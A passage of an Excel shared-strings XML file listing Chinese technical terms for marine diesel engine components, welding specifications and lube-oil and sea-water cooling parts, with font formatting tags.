        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水中央冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却泵布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却泵总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>台增压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却水备用泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却水泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却水系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要及辅助系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却水主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水排泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊后处理规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接把手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接编码缩写质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接的支撑环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接活塞头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接活塞头生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接机架剖面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接机座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接机座部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接接头</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接排气总管的质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接气缸体的生产技术规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接区域蚀刻质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接曲轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>MC,S34MNV</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>生产说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接异径管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接制动托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接中间机架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接组件检测</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊条头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号码盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>合成橡胶软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>合成橡胶绳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>合金</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温阀出口高温</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒压阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>珩磨装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横截面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁，推力轴承焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁后端，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁气缸单元，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁前端，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁轴颈，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>红灯玻璃</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>红套环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧安全钩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧机座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧上部走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧上部走台支架布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧上层走台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧折叶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧中部走台地板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧中层走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧中层走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端板，油底壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端扫气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端箱的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端箱的加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端箱的预装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端箱压力试验</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端止动件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端主轴承座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弧齿联轴器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弧形止动板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护目镜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>花纹板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(6MM)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>划线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑道总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑动套筒装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油泵进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油泵总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油泵组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油参数</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油出口</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油出口管详图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油出口管装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油出口上部法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油出口吸入管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油出口下部法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油出口橡胶板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油底柜</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油底柜出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
